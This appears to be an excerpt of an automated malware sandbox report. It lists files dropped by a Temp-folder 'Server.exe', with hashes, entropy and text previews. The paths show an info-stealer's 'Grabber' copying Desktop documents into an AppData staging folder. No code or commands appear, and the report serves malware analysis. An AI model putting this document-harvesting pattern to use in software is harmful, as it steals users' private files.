Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
